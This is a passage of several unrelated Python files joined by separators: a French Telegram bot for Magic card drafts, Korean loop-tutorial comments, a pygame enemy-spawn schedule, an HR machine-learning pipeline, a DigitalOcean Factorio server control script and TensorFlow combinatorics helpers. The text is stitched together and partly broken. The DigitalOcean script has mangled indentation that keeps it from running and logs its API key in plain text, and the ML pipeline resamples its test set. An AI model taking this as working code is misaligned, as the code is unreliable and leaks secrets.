                text += f"- <a href='tg://user?id={player.id}'>{player.name}</a>\n"
        else:
            # Add player
            player = session.query(Player).filter(Player.id == int(match)).first()
            self.subscribers.append(player)
            text = "Joueurs selectionnés:\n"
            for player in self.subscribers:
                text += f"- <a href='tg://user?id={player.id}'>{player.name}</a>\n"
        reply_markup = InlineKeyboardMarkup(self.get_select_player_keyboard())
        query.edit_message_text(text=text,
                                parse_mode="HTML",
                                reply_markup=reply_markup)
        return SealedConv.CHOOSING
    def start_sealed(self, update, context):
        """Deal a 90-card sealed pool to each subscriber by private message."""
        # Send sealed
        cards = session.query(Card).join(CubeList).join(Cube).filter(Cube.id == self.cube.id, Card.type_line != "Basic Land").all()
        shuffle(cards)
        shuffle(self.subscribers)
        sealed_size = 90  # cards per sealed pool
        start = 0
        final_text = "Les scellés ont bien été envoyés à :\n"
        for player in self.subscribers:
            pool = cards[start:start+sealed_size]
            start += sealed_size
            url = deckstat.get_sealed_url(pool, title=f"Scellé de {player.name}")
            logging.info(f"{player.name} Sealed Pool [{url}]")
            text = f"{player.name} voici <a href='{url}'>ton scellé</a>.\nPense à créer ton deck avec et à le sauvegarder avant la prochaine partie.\n"
            text += "<i>Pour modifier ton deck utilise l'éditeur deckstat puis enregistre le sur ton compte "\
                    "ou si tu n'as pas de compte fait les modifs sur deckstat puis cliques sur export et copie colle ta decklist terminée dans le chat.</i>"
            context.bot.send_message(chat_id=player.id,
                                     text=text,
                                     parse_mode="HTML")
            final_text += f"- {player.name}\n"
            sleep(1)  # throttle to stay under Telegram rate limits
        update.callback_query.edit_message_text(text=final_text)
    def get_booster_dialogue(self, drafter, is_new_booster=True, row_length=3):
        """Build the (text, keyboard) shown for a drafter's current booster.

        Returns (text, None) when the draft is finished or no booster is
        ready; when finished, also tears down the draft handlers and
        restores the /draft entry point.
        """
        text = f"Un booster tout frais est disponible !\n\n"
        booster = drafter.get_booster()
        if booster and booster.from_drafter:
            text = f"<a href='tg://user?id={booster.from_drafter.id}'>{booster.from_drafter.name}</a> vient de te passer son booster !\n\n"
        text += f"<u>Ronde {self.draft.round_count}/{self.draft.round_num}</u>"
        if drafter.pool:
            text += f"\nMon dernier pick: <a href='https://scryfall.com/card/{drafter.pool[-1].scryfall_id}'>{drafter.pool[-1].name}</a>"
            if len(drafter.pool) > 1:
                text += f"\nVoir mon pool: /pool"
        if is_new_booster or not drafter.choice:
            text += "\nSelectionne une carte :\n"
        else:
            text += "\nChoix pris en compte. En attente des autres joueurs...\n"
        if not booster:
            # No booster left: the draft is over — persist and send the pool.
            session.commit()
            url = deckstat.get_sealed_url(drafter.pool, title=f"Draft de {drafter.name}")
            text = f"Draft terminé. Voici ton <a href='{url}'>pool</a>"
            # TODO : function to clean draft data and handlers
            if self.drafted_card_handler:
                self.dispatcher.remove_handler(self.draft_pool_handler)
                self.dispatcher.remove_handler(self.drafted_card_handler)
                self.drafted_card_handler = None
                # Add entry point
                self.dispatcher.add_handler(self.draft_handler)
            return text, None
        cards = booster.cards
        if not cards:
            text += "Pas de cartes à drafter pour le moment."
            return text, None
        choice_emoji = "\U0001F448"
        keyboard = []
        # Lay the pick buttons out row_length per row; the already-chosen
        # card is rendered in bold with the pointing emoji and no button.
        for i in range(0, len(cards), row_length):
            row = []
            max = i + row_length
            if max > len(cards): max = len(cards)
            for n in range(i, max, 1):
                if drafter.choice and cards[n] == drafter.choice.card:
                    text += f"{n+1}) <b><a href='{cards[n].image_url}'>{cards[n].name}</a></b>{choice_emoji}\n"
                else:
                    callback_data = f"[{self.get_callback_pattern(id_only=True)}]card_id={cards[n].id}"
                    row.append(InlineKeyboardButton(f"{n+1}", callback_data=callback_data))
                    text += f"{n+1}) <a href='{cards[n].image_url}'>{cards[n].name}</a>\n"
            keyboard.append(row)
        return text, InlineKeyboardMarkup(keyboard)
    def get_callback_pattern(self, id_only=False):
        """Regex (or bare id) binding card callbacks to draft/round/pick state."""
        # pattern example: [3124]card_id=208
        # If pattern is False return only the id
        i = f"{self.draft.id}{self.draft.round_count}{self.draft.drafters[0].pick_count}"
        if id_only: return i
        p = r"^\[" + i + r"\]card_id=(\d*)$"
        logging.info(f"Callback pattern: {p}")
        return p
    def start_draft(self, update, context):
        """Begin a draft: build boosters, register pick handlers, message drafters."""
        # Remove entry point
        self.dispatcher.remove_handler(self.draft_handler)
        self.draft = Draft(cube=self.cube)
        [self.draft.add_drafter(Drafter(s.id, s.name)) for s in self.subscribers]
        remaining_cards, filename = set_boosters(self.draft)
        # Send the undistributed cards back to the admin as a document.
        self.send_doc(chat_id=update.callback_query.from_user.id,
                      context=context,
                      content=remaining_cards,
                      filename=filename)
        self.draft.start()
        self.drafted_card_handler = CallbackQueryHandler(self.choose_card, pattern=self.get_callback_pattern())
        self.dispatcher.add_handler(self.drafted_card_handler)
        self.draft_pool_handler = CommandHandler("pool", self.get_drafter_pool)
        self.dispatcher.add_handler(self.draft_pool_handler)
        for drafter in self.draft.drafters:
            drafter.data = {"query": None}
            text, reply_markup = self.get_booster_dialogue(drafter)
            context.bot.send_message(chat_id=drafter.id,
                                     text=text,
                                     reply_markup=reply_markup,
                                     parse_mode="HTML",
                                     disable_web_page_preview=True,
                                     disable_notification=False)
    def choose_card(self, update, context):
        """Record a drafter's pick; advance boosters/rounds when all have picked."""
        query = update.callback_query
        drafter = self.draft.get_drafter_by_id(query.from_user.id)
        reg = re.compile(r"card_id=(\d*)")
        match = int(reg.findall(query.data)[0])
        card = session.query(Card).filter(Card.id == match).first()
        pick_count = drafter.pick_count
        round_count = self.draft.round_count
        is_new_booster, is_new_round = drafter.choose(card)
        drafter.data["query"] = query
        # If new booster or new round, we edit previous query message then send new reply markup for all drafters
        if is_new_booster or is_new_round:
            # Update callback pattern to avoid an old callback to to send wrong data
            self.drafted_card_handler.pattern = self.get_callback_pattern()
            for drafter in self.draft.drafters:
                # If auto pick is activated, send the auto pick to drafter
                if is_new_round and self.draft.auto_pick_last_card:
                    self.send_card(drafter.pool[-2],
                                   msg_data=drafter.data["query"],
                                   title=f"Ronde {round_count} Pick {pick_count}")
                    self.send_card(drafter.pool[-1],
                                   msg_data=drafter.id,
                                   title=f"Ronde {round_count} Pick {pick_count+1}",
                                   context=context)
                else:
                    self.send_card(drafter.pool[-1],
                                   msg_data=drafter.data["query"],
                                   title=f"Ronde {round_count} Pick {pick_count}")
                text, reply_markup = self.get_booster_dialogue(drafter, is_new_booster=is_new_booster)
                sleep(0.5)  # throttle to stay under Telegram rate limits
                context.bot.send_message(chat_id=drafter.id,
                                         text=text,
                                         reply_markup=reply_markup,
                                         parse_mode="HTML",
                                         disable_web_page_preview=True,
                                         disable_notification=False)
        # If a choice is made but not all users made one, we show choosed card
        else:
            text, reply_markup = self.get_booster_dialogue(drafter, is_new_booster)
            query.edit_message_text(text=text,
                                    reply_markup=reply_markup,
                                    parse_mode="HTML",
                                    disable_web_page_preview=True)
    def get_drafter_pool(self, update, context):
        """/pool command: link to the drafter's current pool (needs >= 2 cards)."""
        text = "Il te faut au moins avoir drafté 2 cartes pour voir ton pool."
        drafter = self.draft.get_drafter_by_id(update.message.from_user.id)
        if len(drafter.pool) > 1:
            url = deckstat.get_sealed_url(drafter.pool, title=f"Draft de {drafter.name}")
            text = f"Voici <a href='{url}'>ton pool</a>."
        update.message.reply_text(text=text,
                                  parse_mode="HTML")
    @staticmethod
    def send_card(card, msg_data, title, context=None):
        """Show *card* as a titled link.

        With *context*, sends a new message to chat id *msg_data*; without,
        *msg_data* is treated as a callback query whose message is edited.
        """
        text = f"<a href='{card.image_url}'>{title}</a>"#https://scryfall.com/card/
        if context:
            context.bot.send_message(chat_id=msg_data,
                                     text=text,
                                     parse_mode="HTML",
                                     disable_web_page_preview=False)
        else:
            msg_data.edit_message_text(text=text,
                                       parse_mode="HTML",
                                       disable_web_page_preview=False)
        sleep(0.5)
    @staticmethod
    def send_doc(chat_id, context, content, filename):
        """Send *content* (a str) as a document named *filename* to *chat_id*."""
        s = io.StringIO(content)
        s.seek(0)
        document = io.BytesIO()
        document.write(s.getvalue().encode())
        document.seek(0)
        document.name = filename
        context.bot.send_document(chat_id=chat_id, document=document)
|
# while <불 표현식>
# 명령어
# i =0
# while i < 10 :
# print(i)
# i += 1
# numbers =[1,3,1,5,18,1,0]
# while 1 in numbers:
# numbers.remove(1)
# print(numbers)
# 특정 시간 동안 대기하는 프로그램 작성
# import time
# fi = time.time()
# while fi + 3 >= time.time():
# pass
# print("3초가 지났습니다.")
# import time
# fi = time.time()
# while fi + 1 >= time.time():
# print("xyz", end="")
# print("1초가 지났습니다.")
# i=0
# while True:
# print("{}번째 실행하고 있습니다.".format(i))
# i += 1
# input_text = input("> 종료하시겠습니까? y, n")
# if input_text.lower()=="y":
# print("반복을 종료합니다")
# break
# continue 현재 반복을 중지하고, 다음 반복으로 넘어간다.
# Chop the tree ten times; announce when it falls on the tenth hit.
for treeHit in range(1, 11):
    print("나무를 %d번 찍었습니다." %treeHit)
    if treeHit == 10:
        print("나무가 넘어갔습니다.ㅎㅎㅎ")
|
import pygame, enemy, random, graph
FULLSTORYTIME = 10000

def happen(storytime, surface, scr):
    """Spawn enemies according to the story clock *storytime*.

    surface and scr are unused here but kept for the caller's interface.

    Bug fix: declares ``global FULLSTORYTIME`` — the original assignments
    created a dead local variable, so neither the extension to 12000 at
    t == 0 nor the early finish when all enemies are cleared ever took
    effect. Also replaces the ``t//x == t/x`` divisibility trick with the
    clearer, equivalent ``t % x == 0``.
    """
    global FULLSTORYTIME
    t = storytime
    if t == 0:
        FULLSTORYTIME = 12000
        graph.dMP = 0.2
    elif t <= 1000:
        # Warm-up: a regular enemy every 200 ticks.
        if t % 200 == 0: enemy.OrdinEne(random.choice(['L', 'R', 'U', 'D']))
    elif t <= 2000:
        # Introduce each special enemy type once.
        if t == 1100: enemy.SpikeEne(random.choice(['LU', 'LD', 'RU', 'RD']))
        if t == 1300: enemy.HealEne(random.choice(['L', 'R', 'U', 'D']))
        if t == 1500: enemy.WeirdEne(random.choice(['U', 'D']))
        if t == 1700: enemy.SplitEne(random.choice(['L', 'R', 'U', 'D']))
        if t == 1900: enemy.PhantEne(4, random.randint(0, 360))
    elif t <= 4000:
        if t % 200 == 0: enemy.OrdinEne(random.choice(['L', 'R', 'U', 'D']))
        if t % 300 == 0:
            decision = random.randint(0, 3)
            if decision == 0: enemy.SpikeEne(random.choice(['LU', 'LD', 'RU', 'RD']))
            elif decision == 1: enemy.HealEne(random.choice(['L', 'R', 'U', 'D']))
            elif decision == 2: enemy.WeirdEne(random.choice(['U', 'D']))
    elif t <= 5000:
        if t % 150 == 0: enemy.SplitEne(random.choice(['L', 'R', 'U', 'D']))
    elif t <= 5500:
        pass  # breather: nothing spawns
    elif t <= 7500:
        if t % 200 == 0: enemy.OrdinEne(random.choice(['L', 'R', 'U', 'D']))
        if t % 250 == 0:
            decision = random.randint(0, 5)
            if decision == 0: enemy.SpikeEne(random.choice(['LU', 'LD', 'RU', 'RD']))
            elif decision == 1: enemy.HealEne(random.choice(['L', 'R', 'U', 'D']))
            elif decision == 2: enemy.WeirdEne(random.choice(['U', 'D']))
            elif decision == 3: enemy.SplitEne(random.choice(['L', 'R', 'U', 'D']))
            elif decision == 4: enemy.PhantEne(4, random.randint(0, 360))
    elif t <= 8750:
        if t == 8000:
            enemy.PhantEne(5, 30)
            enemy.PhantEne(5, 150)
            enemy.PhantEne(5, 270)
    elif t <= 9500:
        if t == 9000:
            enemy.SpikeEne('LU')
            enemy.SpikeEne('LD')
            enemy.SpikeEne('RU')
            enemy.SpikeEne('RD')
        if t % 200 == 0:
            enemy.WeirdEne('U')
            enemy.WeirdEne('D')
            enemy.PhantEne(3, random.randint(0, 360))
    else:
        # Story content exhausted: end as soon as the field is cleared.
        if len(enemy.enemies) == 0:
            FULLSTORYTIME = t
|
import pandas as pd
import numpy as np
import time
import matplotlib.pyplot as plt
# Load the HR dataset: column 0 is skipped (id), last column is the target.
dataset= pd.read_csv('HR.csv')
X=dataset.iloc[:,1:13]
y=dataset.iloc[:,-1]
m= np.shape(X)[0]  # number of rows
n= np.shape(X)[1]  # number of feature columns
#Age bin
from sklearn.preprocessing import KBinsDiscretizer
est = KBinsDiscretizer(n_bins=6, encode='ordinal', strategy='uniform')
est.fit(X.iloc[:,6:7])
pp=est.transform(X.iloc[:,6:7])
xx=pd.get_dummies(pp.flatten())
#Legnth of service bin
est = KBinsDiscretizer(n_bins=4, encode='ordinal', strategy='uniform')
est.fit(X.iloc[:,8:9])
pp=est.transform(X.iloc[:,8:9])
xx1=pd.get_dummies(pp.flatten())  # NOTE(review): xx1 is never used below
#Avg training score bin
est = KBinsDiscretizer(n_bins=5, encode='ordinal', strategy='uniform')
est.fit(X.iloc[:,11:12])
pp=est.transform(X.iloc[:,11:12])
xx2=pd.get_dummies(pp.flatten())  # NOTE(review): xx2 is never used below
X=X.drop(columns=["age"])
X=pd.concat([X, xx], axis=1)
# Indices of object-typed (categorical) columns.
categorical=[]
for i in range(0,n):
    if X.iloc[:,i].dtype.name == 'object':
        categorical.append(i)
# NOTE(review): sklearn.preprocessing.Imputer was removed in scikit-learn
# 0.22; modern versions provide sklearn.impute.SimpleImputer instead.
from sklearn.preprocessing import Imputer
for i in range(0,n):
    if i not in categorical:
        imputer = Imputer(missing_values = np.nan, strategy = 'mean', axis = 0)
        imputer = imputer.fit(X.iloc[:, i:i+1])
        X.iloc[:, i:i+1] = imputer.transform(X.iloc[:, i:i+1])
# One-hot encode categoricals, dropping the first dummy of each column.
arr2=np.ones((m,1))
for i in categorical:
    arr1= pd.get_dummies(X.iloc[:,i]).iloc[:,1:].to_numpy()
    arr2=np.append(arr2, arr1, axis=1)
arr2=np.delete(arr2, 0, axis=1)  # drop the seed column of ones
X=X.to_numpy()
X=np.delete(X, categorical, axis=1)
X=np.append(X,arr2, axis=1)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state=0)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
from sklearn.decomposition import PCA
pca = PCA(n_components = 2)
X_train = pca.fit_transform(X_train)
X_test = pca.transform(X_test)
ev = pca.explained_variance_ratio_
from collections import Counter
from imblearn.over_sampling import SMOTE
sm = SMOTE(random_state=42)
X_train, y_train = sm.fit_resample(X_train, y_train)
# NOTE(review): resampling the *test* set with SMOTE inflates the reported
# metrics; evaluation is normally done on the untouched test distribution.
X_test, y_test = sm.fit_resample(X_test, y_test)
from xgboost import XGBClassifier
clas=XGBClassifier()
clas.fit(X_train, y_train)
predx=clas.predict(X_test)
from sklearn.metrics import accuracy_score
accuracy_score(y_test, predx)
from sklearn.metrics import precision_recall_fscore_support
precision_recall_fscore_support(y_test, predx)
#Submission
# Build features for the holdout set and write predictions to foo.csv.
Test= pd.read_csv('test_2umaH9m.csv')
X1=Test.iloc[:,1:14]
m= np.shape(X1)[0]
n= np.shape(X1)[1]
from sklearn.preprocessing import KBinsDiscretizer
est = KBinsDiscretizer(n_bins=6, encode='ordinal', strategy='uniform')
est.fit(X1.iloc[:,6:7])
pp=est.transform(X1.iloc[:,6:7])
xx=pd.get_dummies(pp.flatten())
categorical=[]
for i in range(0,n):
    if X1.iloc[:,i].dtype.name == 'object':
        categorical.append(i)
# NOTE(review): sklearn.preprocessing.Imputer was removed in scikit-learn
# 0.22; modern versions provide sklearn.impute.SimpleImputer instead.
from sklearn.preprocessing import Imputer
for i in range(0,n):
    if i not in categorical:
        imputer = Imputer(missing_values = np.nan, strategy = 'mean', axis = 0)
        imputer = imputer.fit(X1.iloc[:, i:i+1])
        X1.iloc[:, i:i+1] = imputer.transform(X1.iloc[:, i:i+1])
arr2=np.ones((m,1))
for i in categorical:
    arr1= pd.get_dummies(X1.iloc[:,i]).iloc[:,1:].to_numpy()
    arr2=np.append(arr2, arr1, axis=1)
arr2=np.delete(arr2, 0, axis=1)
X1=X1.to_numpy()
X1=np.delete(X1, categorical, axis=1)
X1=np.append(arr2,X1, axis=1)
X1=np.append(xx,X1,axis=1)
# Bug fix: the trained model above is named `clas`; `classifier` was an
# undefined name and raised NameError on this line.
# NOTE(review): unlike the training pipeline, X1 is neither scaled nor
# PCA-transformed here, so the feature spaces differ — confirm intended.
acpred= clas.predict(X1)
acpred = (acpred > 0.5)
eid= np.reshape(Test.iloc[:,0].to_numpy(), (-1,1))
Submit=np.append(eid, acpred, axis=1)
np.savetxt("foo.csv", Submit, delimiter=",")
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import time
from time import strftime
from datetime import datetime
import digitalocean
import sys
try:
import keyring
keychain = True
except ImportError:
keychain = False
import logging
import argparse
__version__ = '0.1'
####################################################################################################
##### Config here
####################################################################################################
apikey = None # Digitalocean api key https://www.digitalocean.com/community/tutorials/how-to-use-the-digitalocean-api-v2
#apikey = "myapikeyhere"
vm_name = 'Factorio' # VM name that runs factorio server
vm_region = 'fra1' # fra1 = Frankfurt 1, alternativ nyc1, nyc2, nyc3 = New York, lon1 = London (Has to be the same region where the snapshot is saved!!)
vm_size = '1gb' # Size of VM has to match snapshot or be bigger
snapshot_name = "%d_%b_%Y_%H_%M_%S-" + vm_name # 13_May_2016_13_08_21-Factorio
max_factorio_snapshots = 2 # Maximal number of snapshots to keep of vm_name VM
####################################################################################################
####################################################################################################
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)-2s %(filename)s:%(lineno)s] %(message)s")
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('digitalocean').setLevel(logging.WARNING)
if keychain:
apikey = keyring.get_password('DO_API', 'DO_API')
def getManager():
    """Initialise the DigitalOcean API objects used by every command.

    Sets the module globals ``manager``, ``my_droplets`` and ``droplet``
    (``snapshot`` is declared global but not assigned here). Exits the
    process when no matching ssh key or no snapshot image is found.
    """
    global my_droplets, snapshot, manager, droplet
    logging.info("Getting manager...")
    manager = digitalocean.Manager(token=apikey)
    my_droplets = manager.get_all_droplets()
    # Get ssh key
    # Note: ssh key names are NOT unique, just take the first one
    key = None
    for k in manager.get_all_sshkeys():
        if k.name == 'DO_' + vm_name:
            if key is None:
                key = k
            else:
                logging.error("There are multiple ssh keys with name: " + 'DO_' + vm_name + " on DO, using first found!")
                break
    if key is None:
        logging.error("Got no SSH key!")
        sys.exit(0)
    #TODO: For new Droplet create and upload new key if key doesnt exist on DO
    image = getLatestFactorioImage()
    if image is None:
        logging.error("Could not find latest image of " + vm_name)
        sys.exit(0)
    # Prepared but not created here; the "start" command calls create().
    droplet = digitalocean.Droplet(token=apikey,
                                   name=vm_name,
                                   region=vm_region,
                                   image=image.id,  # Latest matching snapshot
                                   size_slug=vm_size,  # Size of the VM
                                   backups=False,
                                   ssh_keys=[key])
def getLatestFactorioImage():
    """Return the most recent snapshot image of vm_name, or None.

    Bug fix: the original returned the last element of the API's listing,
    which is not guaranteed to be the newest; the images are now sorted by
    the timestamp parsed from their name. Also renames the local that
    shadowed the imported ``time`` module.
    """
    dated_images = []
    for image in manager.get_my_images():
        try:
            taken_at = datetime.strptime(image.name, snapshot_name)
        except ValueError:
            continue  # not a snapshot of this VM
        dated_images.append((taken_at, image))
    if not dated_images:
        return None
    dated_images.sort(key=lambda pair: pair[0])
    latest = dated_images[-1][1]
    logging.info("Latest " + vm_name + " image: " + latest.name)
    return latest
def getFactorioSnapshots():
    """Return every image whose name matches the snapshot_name pattern."""
    matching = []
    for image in manager.get_my_images():
        try:
            # strptime raises ValueError for names that do not match.
            datetime.strptime(image.name, snapshot_name)
        except ValueError:
            continue
        matching.append(image)
    return matching
def cleanUpSnapshots():
    """Delete the oldest factorio snapshots until max_factorio_snapshots remain.

    Bug fix: the original deleted only ONE snapshot per run and assumed the
    API listing was oldest-first; the list is now sorted by the timestamp in
    the snapshot name and trimmed all the way down to the configured cap.
    """
    all_snapshots = manager.get_my_images()
    factorio_snapshots = getFactorioSnapshots()
    logging.info("Out of " + str(len(all_snapshots)) + " found " + str(len(factorio_snapshots)) + " factorio snapshots")
    # Oldest first, by the timestamp embedded in the snapshot name.
    factorio_snapshots.sort(key=lambda s: datetime.strptime(s.name, snapshot_name))
    while len(factorio_snapshots) > max_factorio_snapshots:
        factorio_snapshots.pop(0).destroy()
    logging.info("DONE")
def getFactorioVM():
    """Return the droplet named vm_name from my_droplets, or None."""
    # Find factorio VM
    return next((drop for drop in my_droplets if drop.name == vm_name), None)
# Parse arguments
parser = argparse.ArgumentParser(description='Control script for starting VM on digitalocean')
parser.add_argument(dest='command', type=str, help='status, start, stop, setAPIKEY')
parser.add_argument(dest='apikey', type=str, nargs='?', help='Digitalocean API key')
parser.add_argument('-v', '--verbose', action='store_true', dest='verbose',
                    help="Print debug messages")
parser.add_argument('-ns', '--no-snapshot', action='store_true', dest='no_snapshot',
                    help="Save no snapshot when stopping droplet")
parser.add_argument('-nd', '--no-destroy', action='store_true', dest='no_destroy',
                    help="Don't destroy droplet after stopping")
parser.add_argument('-nc', '--no-cleanup', action='store_true', dest='no_cleanup',
                    help="No snapshot cleanup")
args = parser.parse_args()
if args.verbose:
    logging.getLogger().setLevel(logging.DEBUG)
    logging.debug("Verbose logging enabled")
# An API key on the command line overrides the keychain value.
if args.apikey is not None:
    apikey = args.apikey
if apikey is None:
    logging.error("No apikey given!!")
    sys.exit(0)
# setAPIKEY: persist the key to the OS keychain (needs the keyring package).
if args.command == "setAPIKEY":
    if keychain:
        keyring.set_password("DO_API", "DO_API", apikey)
        logging.info("Saved API key to keychain: " + apikey)
    else:
        logging.error("Missing keyring python libary!")
# start: create a droplet from the latest snapshot and wait until it is up.
if args.command == "start":
    getManager()
    logging.info(str(droplet))
    droplet.create()
    actions = droplet.get_actions()
    for action in actions:
        action.load()
        # Once it shows complete, droplet is up and running
        while "progress" in action.status:
            time.sleep(5)
            action.load()
            logging.info(str(action.status))
    droplet.load()
    logging.info("Droplet ip adress:" + str(droplet.ip_address))
# status: show the factorio droplet and the stored snapshots.
if args.command == "status":
    getManager()
    logging.debug("Running droplets: " + str(my_droplets))
    logging.info("Factorio droplet: " + str(getFactorioVM()))
    #for drop in my_droplets:
    #    logging.info(str(drop.load()))
    all_snapshots = manager.get_my_images()
    logging.debug("Snapshots:" + str(all_snapshots))
    logging.info("Snapshots of " + vm_name + ": " + str(getFactorioSnapshots()))
# stop: shut the VM down, optionally snapshot, destroy and clean up.
if args.command == "stop":
    getManager()
    # Find factorio VM
    factorio = getFactorioVM()
    if factorio is None:
        logging.error("Could not find VM: " + vm_name)
        sys.exit(0)
    if factorio.status != "off":
        logging.info("SHUTDOWN")
        factorio.shutdown()
        actions = factorio.get_actions()
        for action in actions:
            action.load()
            # Once it shows complete, droplet is up and running
            while "progress" in action.status:
                time.sleep(5)
                action.load()
                logging.info(str(action.status))
    if not args.no_snapshot:
        logging.info("TAKE SNAPSHOT")
        factorio.take_snapshot(strftime(snapshot_name), power_off=True)
        actions = factorio.get_actions()
        for action in actions:
            action.load()
            # Once it shows complete, droplet is up and running
            while "progress" in action.status:
                time.sleep(5)
                action.load()
                logging.info(action.status)
    if not args.no_destroy:
        logging.info("DESTROY")
        factorio.destroy()
        actions = factorio.get_actions()
        for action in actions:
            action.load()
            # Once it shows complete, droplet is up and running
            while "progress" in action.status:
                time.sleep(5)
                action.load()
                logging.info(str(action.status))
    if not args.no_cleanup:
        logging.info("CLEANING FACTORIO SNAPSHOTS")
        cleanUpSnapshots()
#%%
import tensorflow as tf
import itertools
import numpy as np
from random import randint
from math import ceil
def utiltest():
    """Smoke-test hook: prints a marker showing this utilities module loaded."""
    print('Utilitie function test.')
#region Multivariate gaussian distribution
# class for substituting package tensorflow_probability.MultivariateNormalDiag
class MultivariateNormalDiag:
    """Minimal stand-in for tensorflow_probability's MultivariateNormalDiag.

    Holds a mean `mu` and builds two matrices from the per-dimension scales
    `sigma`: `Sigma` (|sigma| placed by tf.linalg.diag) and `Sigma_2`
    (sigma**2 placed the same way).

    NOTE(review): both tf.linalg.diag calls use k=1, which places the values
    on the first superdiagonal rather than the main diagonal (k=0) — that
    looks unintended for a diagonal covariance; confirm.
    """
    def __init__(self, mu,sigma):
        self.mu=tf.cast(mu,dtype=tf.float64)
        self.Sigma=tf.linalg.diag(tf.transpose(tf.math.abs(sigma)),k=1)
        self.Sigma_2=tf.linalg.diag(tf.math.square(tf.transpose(sigma)),k=1)
    @tf.function
    def sample(self):
        """Draw one reparameterised sample: mu + Sigma @ eps, eps ~ N(0, I)."""
        eps = tf.random.normal(shape=tf.shape(tf.transpose(self.mu)),dtype=tf.float64)
        return tf.transpose((tf.cast(self.Sigma,dtype=tf.float64)@eps[...,None])[...,0])+self.mu
    # corresponds to kl_divergence(mvnd,self)
    @tf.function
    def kl_divergence(self,mvnd):
        """Closed-form Gaussian KL(mvnd || self), accumulated in float32."""
        # -k term of the KL formula (k = dimensionality of mu).
        retVal=-tf.cast(tf.shape(self.mu)[0],dtype=tf.float32)*tf.ones(tf.shape(self.mu)[1])
        # retVal=tf.cast(retVal,dtype=tf.float64)
        mu1=mvnd.mu
        Sigma1_2=mvnd.Sigma_2
        d=tf.linalg.det(self.Sigma)
        d1=tf.linalg.det(mvnd.Sigma)
        # log-determinant ratio term
        retVal+=tf.cast(tf.math.log(d/d1),dtype=tf.float32)
        Sigma_2_inv=tf.linalg.inv(self.Sigma_2)
        # trace term
        retVal+=tf.cast(tf.linalg.trace(tf.linalg.matmul(Sigma1_2,Sigma_2_inv)),dtype=tf.float32)
        mu=tf.cast(self.mu-mu1,dtype=tf.float32)
        # quadratic (Mahalanobis) term
        retVal+=tf.cast(tf.linalg.diag_part((Sigma_2_inv@mu)[...,0]@mu),dtype=tf.float32)
        return retVal
#endregion
#region combinatorics
def getOuterProduct(li1,li2=None,condition=lambda x,y : True):
    """Return all pairs [i, j] drawn from li1 x li2 that satisfy condition.

    Each argument may be a sequence (its elements are paired) or an int m
    (treated as range(m)). When li2 is omitted, li1 is paired with itself.

    BUG FIX / generalization: the original only handled list+list or int+int
    and silently fell through returning None for every other combination
    (list+int, tuples, ...). Integers are now normalised to ranges, so any
    sequence/int mix works and a list is always returned. Behaviour for the
    previously supported cases is unchanged.
    """
    if li2 is None:
        li2 = li1
    if isinstance(li1, int):
        li1 = range(li1)
    if isinstance(li2, int):
        li2 = range(li2)
    return [[i, j] for i in li1 for j in li2 if condition(i, j)]
def getOuterProduct2Array(ar,condition=lambda x : True):
    """Full grid over the dimension sizes in ar.

    Returns every tuple of range(ar[0]) x range(ar[1]) x ... that satisfies
    condition.
    """
    axes = [tuple(range(size)) for size in ar]
    return [combo for combo in itertools.product(*axes) if condition(combo)]
#region n-ary products
def __checkNAry(list,ar):
    """Return True when every pair of columns in `list` covers all value
    combinations, i.e. for each column pair (i, j) the number of distinct
    (row[i], row[j]) pairs equals ar[i] * ar[j].
    """
    for i in range(len(ar)):
        for j in range(i + 1, len(ar)):
            seen = {'_' + str(row[i]) + '_' + str(row[j]) + '_' for row in list}
            if len(seen) != ar[i] * ar[j]:
                return False
    return True
def __getNAryOuterProduct2Array(ar,n=2):
    """Build a reduced covering design over the dimension sizes in ar.

    Starts from the full grid over the first n dimensions, then extends each
    row with one derived (partly randomised) column per remaining dimension,
    resampling until every pair of columns covers all value combinations
    (see __checkNAry) or 30 retries are exhausted.
    """
    liC=np.array(getOuterProduct2Array(ar[0:n]))
    liC=List([List(l) for l in liC])
    dicFunc={}
    # Extension rule per additional dimension; index 0 is deterministic,
    # the later ones mix in randint so resampling can change the result.
    dicFunc[0]= lambda l: l[0:n].lappend((l[0]+l[1])%ar[n])
    if n==3:
        dicFunc[1]=( lambda l: l[0:n+1].lappend((l[0]+l[2])%ar[n+1]))
        dicFunc[2]=( lambda l: l[0:n+2].lappend((l[0]+l[2]+l[3])%ar[n+2]))
        dicFunc[3]=( lambda l: l[0:n+3].lappend((3*l[0]+2*l[1]+l[3]+randint(0,ar[n+3]))%ar[n+3]))
        # NOTE(review): the modulus below uses ar[n+3] while the randint uses
        # ar[n+4] — possibly a typo for % ar[n+4]; confirm.
        dicFunc[4]=( lambda l: l[0:n+4].lappend((3*l[1]+2*l[2]+l[3]+randint(0,ar[n+4]))%ar[n+3]))
    else:
        dicFunc[1]=( lambda l: l[0:n+1].lappend((3*l[0]+2*l[1]+randint(0,ar[n+1]))%ar[n+1]))
        dicFunc[2]=( lambda l: l[0:n+2].lappend((3*l[1]+2*l[2]+randint(0,ar[n+2]))%ar[n+2]))
    for i in range(len(ar)-n):
        liC1=liC.foreach(dicFunc[i])
        iCNT=0
        # Resample until the pairwise coverage check passes or we give up.
        while not __checkNAry(liC1,ar[0:n+i+1]):
            # liC1=list(map(dicFunc[i],liC))
            liC1=liC.foreach(dicFunc[i])
            iCNT+=1
            if iCNT>30:
                break
        liC=liC1
    return liC
def getNAryOuterProduct2Array(ar,n=2,condition=lambda x : True):
    """Pairwise-covering subset of the full grid over the sizes in ar.

    Dimensions are sorted by decreasing size before delegating to
    __getNAryOuterProduct2Array, and each resulting row is mapped back to
    the caller's original dimension order before filtering by condition.
    NOTE(review): the delegate is always called with n=2; the n parameter
    is otherwise unused here (kept for interface compatibility).
    """
    sized = {idx: -size for idx, size in enumerate(ar)}
    by_size = sorted(sized.items(), key=lambda kv: (kv[1], kv[0]))
    liOrderedDim = [-size for (_, size) in by_size]
    liReordering = [idx for (idx, _) in by_size]
    rows = __getNAryOuterProduct2Array(liOrderedDim, 2)
    reordered = ([row[i] for i in liReordering] for row in rows)
    return [row for row in reordered if condition(row)]
#endregion
def getRandomFractionalCombinatoric(ar,fraction=0.3,condition=lambda x : True):
    """Random sample of the full grid over the sizes in ar.

    Draws distinct random indices into the full combination list until the
